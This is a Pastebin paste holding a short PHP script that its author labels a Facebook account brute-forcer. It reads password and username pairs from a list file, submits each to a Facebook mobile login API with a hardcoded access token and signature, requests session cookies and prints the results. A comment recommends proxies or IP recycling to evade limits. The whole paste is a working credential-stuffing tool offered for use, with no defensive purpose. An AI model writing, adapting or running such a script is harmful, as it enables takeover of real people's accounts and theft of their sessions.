Advertisement
Guest User

Untitled

a guest
Feb 20th, 2020
324
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.92 KB | None | 0 0
  1. <?php
  2. /* fb account bruteforce shit
  3. todo: use it with bunch of proxies or ip recycler
  4.  
  5. to use, make a list.txt file and make the entries inside follow this format :
  6. password|username/phone/email
  7. */
  8. function startchk($user, $pass){
  9. $result = file_get_contents("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=$user&locale=en_US&password=$pass&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6");
  10. $jsonaccess = json_decode($result);
  11. echo $result;
  12. }
  13. $file = file_get_contents("list.txt");
  14. $list = explode(PHP_EOL, $file);
  15. $cnt = count($list);
  16. set_time_limit($cnt * 3600);
  17. foreach ($list as $key => $cc) {
  18. $pass = explode("|", $cc)[0];
  19. $user = explode("|", $cc)[1];
  20. ob_start();
  21. startchk($user, $pass);
  22. $output = ob_get_contents();
  23. ob_end_clean();
  24. echo $output . "</br>";
  25. ob_flush();
  26. flush();
  27. }
  28. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement